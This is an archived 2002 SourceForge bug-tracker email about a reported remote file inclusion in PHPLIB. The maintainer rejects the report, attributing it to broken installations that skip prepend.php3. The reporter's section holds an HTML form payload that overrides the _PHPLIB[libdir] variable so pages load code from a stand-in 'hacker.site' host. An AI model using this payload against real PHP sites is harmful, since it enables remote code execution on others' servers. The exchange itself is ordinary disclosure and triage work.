[Phplib-trackers] [ phplib-Bugs-524783 ] Security HOLE

[<no...@so...>]

Bugs item #524783, was opened at 2002-03-03 01:02
You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=403611&aid=524783&group_id=31885

Category: None
Group: None
>Status: Closed
>Resolution: Rejected
Priority: 5
Submitted By: Nobody/Anonymous (nobody)
Assigned to: Richard Archer (richardarcher)
Summary: Security HOLE

Initial Comment:
!!!Remote code execution !!!

file:
/pages/new_user_alt.php3
/pages/view_sessions.php3
/pages/showoff.php3

line:

include($_PHPLIB["libdir"] . "table.inc");

example:

<form method=POST 
action="http://phplib.sourceforge.net/showroom/view_ses
sions.php3">
<input type=hidden name="_PHPLIB[libdir]" 
value="http://hacker.site/some_path/">
<input type=submit>

versions tested: <7.4-pr1

tested, (and works) on
http://phplib.sourceforge.net/


----------------------------------------------------------------------

Comment By: Richard Archer (richardarcher)
Date: 2002-03-03 12:12

Message:
Logged In: YES 
user_id=279311

This is not a security flaw in PHPLIB.

There was once a problem with _PHPLIB handling, but that was
fixed back in July 2001 with the release of 7.2d.

The "test cases" described are due to a broken installation
of PHPLIB, not a flaw in the library.

To avoid the possibility of remote code being executed on
PHPLIB pages, prepend.php3 must be included at the start of
any file which uses PHPLIB. It contains the lines:

$_PHPLIB = array();
# Can't control your include path?
# Point this to your PHPLIB base directory. Use a trailing "/"!
$_PHPLIB["libdir"]  = "";

This initialises the include path variable so that it cannot
be overridden by crafted form input.


Unless more convincing evidence of a problem is forthcoming,
this bug report will be closed with no action taken.


----------------------------------------------------------------------

You can respond by visiting: 
http://sourceforge.net/tracker/?func=detail&atid=403611&aid=524783&group_id=31885